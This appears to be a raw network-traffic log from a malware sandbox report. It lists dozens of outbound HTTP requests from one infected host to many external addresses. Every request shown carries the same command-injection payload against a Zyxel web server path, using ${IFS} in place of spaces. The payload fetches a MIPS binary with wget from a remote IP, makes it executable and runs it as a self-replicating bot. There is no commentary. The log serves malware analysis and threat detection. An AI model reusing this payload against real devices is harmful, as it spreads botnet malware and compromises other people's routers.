                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        75192.168.2.144553020.33.51.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872634888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        76192.168.2.1433574178.132.148.202443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872649908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        77192.168.2.144188061.109.96.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872693062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        78192.168.2.1436828138.168.229.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872823000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        79192.168.2.1447828203.111.223.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872827053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        80192.168.2.1459704126.197.39.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872827053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        81192.168.2.144491652.128.169.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872853041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        82192.168.2.1457454145.25.46.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872862101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        83192.168.2.145028632.69.28.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.872945070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        84192.168.2.145496642.25.43.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873003960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        85192.168.2.1435578178.168.89.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873051882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        86192.168.2.1454360129.97.89.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873087883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        87192.168.2.144902271.150.166.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873172998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        88192.168.2.1452198185.253.213.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873213053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        89192.168.2.1444280182.156.222.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873315096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        90192.168.2.143508875.92.130.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873353958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        91192.168.2.143722684.249.239.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873354912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        92192.168.2.1435470186.110.190.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873459101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        93192.168.2.1455380216.249.85.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873466015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        94192.168.2.1444006138.107.127.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873544931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        95192.168.2.144689263.187.24.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873600006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        96192.168.2.1447644104.161.122.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873600960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        97192.168.2.1449196162.213.173.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873631001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        98192.168.2.1434686107.3.231.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873707056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        99192.168.2.1455688177.82.240.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873711109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        100192.168.2.1437172176.240.127.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873784065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        101192.168.2.1442218117.164.171.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873855114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        102192.168.2.1449512158.102.203.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873852968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        103192.168.2.1447658205.59.15.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.873899937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        104192.168.2.14485965.126.195.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874006033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        105192.168.2.1458396203.133.198.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874032021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        106192.168.2.1453156187.25.188.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874128103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        107192.168.2.145768237.37.35.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874155045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        108192.168.2.1449026200.139.113.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874279976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        109192.168.2.1448924151.56.58.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874288082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        110192.168.2.1458196155.10.239.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874358892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        111192.168.2.144160012.114.133.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874361992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        112192.168.2.1452248123.209.194.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874438047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        113192.168.2.143805698.206.228.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874489069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        114192.168.2.14438904.153.225.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874514103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        115192.168.2.144202073.126.179.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874560118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        116192.168.2.1457820191.111.214.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874591112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        117192.168.2.1444668209.174.99.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874679089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        118192.168.2.1445606139.185.194.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874701977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        119192.168.2.1439570174.145.206.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:58.874855042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        120192.168.2.1450326164.90.100.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:59.884171963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        121192.168.2.1440572112.17.245.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:59.884253979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        122192.168.2.1446834209.161.70.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:59.884325027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        123192.168.2.1434280192.58.53.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:11:59.888216972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        124192.168.2.144686686.93.207.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:00.893867016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        125192.168.2.1458998103.235.130.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:00.893925905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        126192.168.2.1459992134.97.189.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:00.893968105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        127192.168.2.1433534182.228.1.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:00.894033909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        128192.168.2.1457716168.224.11.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:00.894110918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        129192.168.2.144665496.12.167.198443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:01.899686098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        130192.168.2.145923664.82.69.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:01.899782896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        131192.168.2.1445012170.247.28.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:02.905064106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        132192.168.2.145031895.218.36.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:02.905179024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        133192.168.2.145855675.190.132.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:04.915844917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        134192.168.2.143965617.82.63.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:04.915941000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        135192.168.2.145739490.29.245.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:05.920980930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        136192.168.2.1437420197.232.35.154443
                                                        TimestampBytes transferredDirectionData
